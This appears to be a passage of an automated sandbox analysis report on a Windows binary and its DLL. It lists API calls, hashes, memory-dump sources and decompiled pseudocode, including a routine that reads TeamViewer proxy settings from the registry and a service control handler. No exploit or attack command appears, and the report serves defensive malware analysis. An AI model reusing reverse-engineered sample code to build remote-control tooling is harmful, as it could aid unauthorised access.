                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 005037F6
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\TeamViewer3,00000000,00000001,?,00000000,00000054,0050422B,?,TV3REG,00000000,?,00749778,00000000,00000090), ref: 00503823
                                                                                                                          • Part of subcall function 004D8E8D: __EH_prolog3.LIBCMT ref: 004D8E94
                                                                                                                          • Part of subcall function 0040D53A: char_traits.LIBCPMT ref: 0040D55F
                                                                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000,000000FF,?,?,Proxy_IP), ref: 0050388E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseH_prolog3H_prolog3_Openchar_traits
                                                                                                                        • String ID: Proxy_IP$SOFTWARE\TeamViewer3
                                                                                                                        • API String ID: 1636729521-564699907
                                                                                                                        • Opcode ID: 8b8b3f45950f3b9b4ba12f8d660e7988052ba13638ac5e666e0360042114d55a
                                                                                                                        • Instruction ID: bcc368aa53542c86c2cb5e05f7fa938efaf3251d6d3b89b37230df6600facaff
                                                                                                                        • Opcode Fuzzy Hash: 8b8b3f45950f3b9b4ba12f8d660e7988052ba13638ac5e666e0360042114d55a
                                                                                                                        • Instruction Fuzzy Hash: A631A370905148AADF15EBE9C856AEDBF39AF24308F14806EF111771D1DA785F08C765
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00534014, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindMITargetTypeInstance.LIBCMT ref: 0053406A
                                                                                                                          • Part of subcall function 00533DBE: PMDtoOffset.LIBCMT ref: 00533E4C
                                                                                                                        • FindVITargetTypeInstance.LIBCMT ref: 00534071
                                                                                                                        • PMDtoOffset.LIBCMT ref: 00534081
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 005340B5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: FindInstanceOffsetTargetType$Exception@8Throw
                                                                                                                        • String ID: Bad dynamic_cast!
                                                                                                                        • API String ID: 1201063319-2956939130
                                                                                                                        • Opcode ID: 92d32a1ffb4fa5d716ff78c610ca4a167ebf75a860a1ece68e4e1ed39334a69c
                                                                                                                        • Instruction ID: 02c747076542a1df120f515d282fc8964f5114e4f5ffc62588cd54f2b7eae7be
                                                                                                                        • Opcode Fuzzy Hash: 92d32a1ffb4fa5d716ff78c610ca4a167ebf75a860a1ece68e4e1ed39334a69c
                                                                                                                        • Instruction Fuzzy Hash: DC11A276B002059FCB14EE74D90AAAE7FB4BF84751F144444E501EB292EB34EA019F90
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F334FE0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 60%
                                                                                                                        			E6F334FE0(intOrPtr _a4) {
				char* _v0;
				char _v264;
				char _v272;
				char* _t9;
				int _t10;
				void* _t11;
				intOrPtr _t15;
				void* _t21;
				void* _t22;

				_t21 =  &_v264;
				_push(0x105);
				_push( &_v264);
				L6F33C2EE();
				_t9 = _v0;
				if(_t9 == 0) {
					_t9 = M6F340530; // 0xa32c28
				}
				_t10 = wsprintfA( &_v272, "\"%s\"", _t9);
				_t15 = _a4;
				_t22 = _t21 + 0xc;
				if(_t15 > 0) {
					wsprintfA(_t22 + _t10 + 8, " w %d", _t15);
					_t22 = _t22 + 0xc;
				}
				_t11 = M6F3404D4; // 0xa45f28
				_push(_t11);
				_push(0);
				_push(0);
				_push(0);
				return E6F334EF0( &_v264, 1, 0);
			}












                                                                                                                        0x6f334fe0
                                                                                                                        0x6f334fe6
                                                                                                                        0x6f334fef
                                                                                                                        0x6f334ff0
                                                                                                                        0x6f334ff5
                                                                                                                        0x6f334ffe
                                                                                                                        0x6f335000
                                                                                                                        0x6f335000
                                                                                                                        0x6f335017
                                                                                                                        0x6f335019
                                                                                                                        0x6f335020
                                                                                                                        0x6f335025
                                                                                                                        0x6f335032
                                                                                                                        0x6f335034
                                                                                                                        0x6f335034
                                                                                                                        0x6f335037
                                                                                                                        0x6f33503c
                                                                                                                        0x6f33503d
                                                                                                                        0x6f33503f
                                                                                                                        0x6f335041
                                                                                                                        0x6f33505b

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$MemoryZero
                                                                                                                        • String ID: w %d$"%s"
                                                                                                                        • API String ID: 3693688802-504233264
                                                                                                                        • Opcode ID: cc1f0dedeb594d3dc9045783fbe87b615ddf5d5930b522b8c07a856487b524b8
                                                                                                                        • Instruction ID: d7e8c9fe9642e7e2dd183943a42b91e8614807a1d19678c65d97b6b3a4a52554
                                                                                                                        • Opcode Fuzzy Hash: cc1f0dedeb594d3dc9045783fbe87b615ddf5d5930b522b8c07a856487b524b8
                                                                                                                        • Instruction Fuzzy Hash: 18F0C273A0435467DB24EB68DC42FD773ACAB94704F00041DB684DB2C1EAB2A558CB95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004A2880, Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004A2887
                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000004,004C5A03,?,00000002,?,00000000,0000042C), ref: 004A2895
                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,00000002,?,00000000,0000042C), ref: 004A28B0
                                                                                                                        • _strtol.LIBCMT ref: 004A28F9
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004A290F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$Leave$EnterH_prolog3_strtol
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2502800903-0
                                                                                                                        • Opcode ID: f7f6c4bfb273c7a2f3ca1b5349d5f9134ce44b387ca9d11afbfbe40468a58ae5
                                                                                                                        • Instruction ID: dbbd4bc630c5cef6c32fefb03738c3f9b631d074113d92f91c4ff0c48401bed5
                                                                                                                        • Opcode Fuzzy Hash: f7f6c4bfb273c7a2f3ca1b5349d5f9134ce44b387ca9d11afbfbe40468a58ae5
                                                                                                                        • Instruction Fuzzy Hash: 0B11EC31E0420697E7316B2C8E0572EB764BBA2721F15071EF472A62D0CBBC5D417609
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004A291E, Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004A2925
                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000004,004A2A9D,000000FF,?,00000001,3B9ACA00,00781FF0,00000001,00000024,004BDFB1,00000000,00000000, Except: ,00000000,0077C1F8), ref: 004A2933
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004A294E
                                                                                                                        • _strtol.LIBCMT ref: 004A2999
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004A29AF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$Leave$EnterH_prolog3_strtol
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2502800903-0
                                                                                                                        • Opcode ID: 37c9610866bf00587f247864d3f2b76478b1e00bfd13e4ea9a01ff77ac72e08c
                                                                                                                        • Instruction ID: 9493fe94d5cb17c39f28cebf53e62ab83799b8b87c0f5c052e7058186503f85b
                                                                                                                        • Opcode Fuzzy Hash: 37c9610866bf00587f247864d3f2b76478b1e00bfd13e4ea9a01ff77ac72e08c
                                                                                                                        • Instruction Fuzzy Hash: A1112CB1F00202D7EB315F1CCE0576FB7A8BBA6B21F10451AE455A7390CBB85E41A709
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F33C13A, Relevance: 7.5, APIs: 5, Instructions: 49timethreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33C13A() {
				struct _FILETIME _v12;
				signed int _v16;
				union _LARGE_INTEGER _v20;
				signed int _t14;
				signed int _t16;
				signed int _t17;
				signed int _t18;
				signed int _t22;
				signed int _t23;
				signed int _t32;

				_t14 =  *0x6f340264; // 0x3f5f602c
				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				_v12.dwHighDateTime = _v12.dwHighDateTime & 0x00000000;
				if(_t14 == 0xbb40e64e || (0xffff0000 & _t14) == 0) {
					GetSystemTimeAsFileTime( &_v12);
					_t16 = GetCurrentProcessId();
					_t17 = GetCurrentThreadId();
					_t18 = GetTickCount();
					QueryPerformanceCounter( &_v20);
					_t22 = _v16 ^ _v20.LowPart;
					_t32 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t16 ^ _t17 ^ _t18 ^ _t22;
					if(_t32 == 0xbb40e64e || ( *0x6f340264 & 0xffff0000) == 0) {
						_t32 = 0xbb40e64f;
					}
					 *0x6f340264 = _t32;
					 *0x6f340268 =  !_t32;
					return _t22;
				} else {
					_t23 =  !_t14;
					 *0x6f340268 = _t23;
					return _t23;
				}
			}













                                                                                                                        0x6f33c142
                                                                                                                        0x6f33c147
                                                                                                                        0x6f33c14b
                                                                                                                        0x6f33c15d
                                                                                                                        0x6f33c171
                                                                                                                        0x6f33c17d
                                                                                                                        0x6f33c185
                                                                                                                        0x6f33c18d
                                                                                                                        0x6f33c199
                                                                                                                        0x6f33c1a2
                                                                                                                        0x6f33c1a5
                                                                                                                        0x6f33c1a9
                                                                                                                        0x6f33c1b3
                                                                                                                        0x6f33c1b3
                                                                                                                        0x6f33c1b8
                                                                                                                        0x6f33c1c0
                                                                                                                        0x00000000
                                                                                                                        0x6f33c163
                                                                                                                        0x6f33c163
                                                                                                                        0x6f33c165
                                                                                                                        0x00000000
                                                                                                                        0x6f33c165

                                                                                                                        APIs
                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 6F33C171
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 6F33C17D
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6F33C185
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F33C18D
                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 6F33C199
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1445889803-0
                                                                                                                        • Opcode ID: eef9a7c3295c226a5235201894336f2e9d192f466f08500627768503cdccbb11
                                                                                                                        • Instruction ID: d6c5491c1d20ec5ae5364ca9b800365bae88bd44d49d82afefd14c1119ee2fc5
                                                                                                                        • Opcode Fuzzy Hash: eef9a7c3295c226a5235201894336f2e9d192f466f08500627768503cdccbb11
                                                                                                                        • Instruction Fuzzy Hash: 810188B3D00A759BDF10EBB4C54859EB7FDEB4A361F51091AE811E7154DB709924CB80
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F333A70, Relevance: 7.5, APIs: 5, Instructions: 47memorythreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F333A70(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t9;

				_t9 = _a4 - 1;
				if(_t9 > 0xd) {
					L10:
					SetServiceStatus( *0x6f340394, 0x6f34043c);
					return 0;
				}
				switch( *((intOrPtr*)(( *(_t9 + 0x6f333b48) & 0x000000ff) * 4 +  &M6F333B34))) {
					case 0:
						 *0x6f340440 = 1;
						 *0x6f340448 = 0;
						 *0x6f340450 = 0;
						 *0x6f340454 = 0;
						goto L10;
					case 1:
						 *0x6f340440 = 7;
						goto L10;
					case 2:
						 *0x6f340440 = 4;
						goto L10;
					case 3:
						if(_a8 == 5) {
							_t13 = _a12;
							_t20 = _t19 | 0xffffffff;
							if(_t13 != 0) {
								_t20 =  *(_t13 + 4);
							}
							_t15 = HeapAlloc(GetProcessHeap(), 8, 4);
							if(_t15 != 0) {
								 *_t15 = _t20;
								CloseHandle(CreateThread(0, 0, E6F333930, _t15, 0, 0));
							}
						}
						goto L10;
					case 4:
						goto L10;
				}
			}




                                                                                                                        0x6f333a74
                                                                                                                        0x6f333a79
                                                                                                                        0x6f333b1a
                                                                                                                        0x6f333b26
                                                                                                                        0x6f333b2f
                                                                                                                        0x6f333b2f
                                                                                                                        0x6f333a86
                                                                                                                        0x00000000
                                                                                                                        0x6f333af2
                                                                                                                        0x6f333afc
                                                                                                                        0x6f333b06
                                                                                                                        0x6f333b10
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f333ada
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f333ae6
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f333a92
                                                                                                                        0x6f333a98
                                                                                                                        0x6f333a9c
                                                                                                                        0x6f333aa1
                                                                                                                        0x6f333aa3
                                                                                                                        0x6f333aa3
                                                                                                                        0x6f333ab1
                                                                                                                        0x6f333ab9
                                                                                                                        0x6f333ac9
                                                                                                                        0x6f333ad2
                                                                                                                        0x6f333ad2
                                                                                                                        0x6f333ab9
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000004), ref: 6F333AAA
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F333AB1
                                                                                                                        • CreateThread.KERNEL32 ref: 6F333ACB
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F333AD2
                                                                                                                        • SetServiceStatus.ADVAPI32(00000000,6F34043C), ref: 6F333B26
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$AllocCloseCreateHandleProcessServiceStatusThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3654718518-0
                                                                                                                        • Opcode ID: aa1efb9f6c07cb329115d044f5e6efb0496722ea239d2bec41fa2f3847d00fd6
                                                                                                                        • Instruction ID: 29d6f13638d0993f3e0a8b13f1bf11f7bfa277bd62d3ba558cd9a01db6c5939e
                                                                                                                        • Opcode Fuzzy Hash: aa1efb9f6c07cb329115d044f5e6efb0496722ea239d2bec41fa2f3847d00fd6
                                                                                                                        • Instruction Fuzzy Hash: EC115EB2B046A4EBEB10EF60C91AB1537ACF722724F00850CF985CB2C1CB75E4698F16
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00534781, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __lock.LIBCMT ref: 0053479F
                                                                                                                          • Part of subcall function 005445FC: __mtinitlocknum.LIBCMT ref: 00544610
                                                                                                                          • Part of subcall function 005445FC: __amsg_exit.LIBCMT ref: 0054461C
                                                                                                                          • Part of subcall function 005445FC: EnterCriticalSection.KERNEL32(?,?,?,00538380,00000004,007D5840,0000000C,00540F8F,005343D6,005343D6,00000000,00000000,00000000,005430DD,00000001,00000214), ref: 00544624
                                                                                                                        • ___sbh_find_block.LIBCMT ref: 005347AA
                                                                                                                        • ___sbh_free_block.LIBCMT ref: 005347B9
                                                                                                                        • HeapFree.KERNEL32(00000000,005343D6,007D55F8,0000000C,005445DD,00000000,007D5C28,0000000C,00544615,005343D6,?,?,00538380,00000004,007D5840,0000000C), ref: 005347E9
                                                                                                                        • GetLastError.KERNEL32(?,00538380,00000004,007D5840,0000000C,00540F8F,005343D6,005343D6,00000000,00000000,00000000,005430DD,00000001,00000214), ref: 005347FA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2714421763-0
                                                                                                                        • Opcode ID: 6cd2ecc568039ce1914cf72dfb0ca282ceb4614ede5004a7f77ad4998f14ae1f
                                                                                                                        • Instruction ID: aa6f19fdca9f5d674bc5b41208df79506562bb03828fa21c8c922d719d85d9b4
                                                                                                                        • Opcode Fuzzy Hash: 6cd2ecc568039ce1914cf72dfb0ca282ceb4614ede5004a7f77ad4998f14ae1f
                                                                                                                        • Instruction Fuzzy Hash: DC016271941212ABEF206FB1AC0E79E7FA4BF82725F208619F501A60D1DB38A9418F58
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F332D50, Relevance: 7.5, APIs: 5, Instructions: 35sleepwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F332D50() {
				struct HWND__* _t1;
				int _t3;
				void* _t10;

				_t1 =  *0x6f340398; // 0x900c2
				if(_t1 != 0) {
					_t3 = IsWindow(_t1);
					_t1 =  *0x6f340398; // 0x900c2
					if(_t3 != 0) {
						PostMessageA(_t1, 0x10, 0, 0);
						_t1 =  *0x6f340398; // 0x900c2
					}
				}
				_t10 = 0;
				while(_t1 != 0 && IsWindow(_t1) != 0) {
					Sleep(0x3e8);
					_t10 = _t10 + 1;
					if(_t10 < 0xa) {
						_t1 =  *0x6f340398; // 0x900c2
						continue;
					}
					break;
				}
				ExitProcess(0);
			}






                                                                                                                        0x6f332d50
                                                                                                                        0x6f332d60
                                                                                                                        0x6f332d63
                                                                                                                        0x6f332d67
                                                                                                                        0x6f332d6c
                                                                                                                        0x6f332d75
                                                                                                                        0x6f332d7b
                                                                                                                        0x6f332d7b
                                                                                                                        0x6f332d6c
                                                                                                                        0x6f332d86
                                                                                                                        0x6f332d95
                                                                                                                        0x6f332da5
                                                                                                                        0x6f332da7
                                                                                                                        0x6f332dab
                                                                                                                        0x6f332d90
                                                                                                                        0x00000000
                                                                                                                        0x6f332d90
                                                                                                                        0x00000000
                                                                                                                        0x6f332dab
                                                                                                                        0x6f332daf

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ExitMessagePostProcessSleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1225241566-0
                                                                                                                        • Opcode ID: 96b7273d5526f07ef142c503ff518529b87dc2b562b7db9f2bbd9aae30797ac1
                                                                                                                        • Instruction ID: f91ca1ccadcb87735e5ada1e215396bb47b15f30d2e55129e197c4c3ab5191d8
                                                                                                                        • Opcode Fuzzy Hash: 96b7273d5526f07ef142c503ff518529b87dc2b562b7db9f2bbd9aae30797ac1
                                                                                                                        • Instruction Fuzzy Hash: 87F02E73F407A6A7EA50EB7DCD85F46379C974AB21F000118BD54D7080CA30F8208EB4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

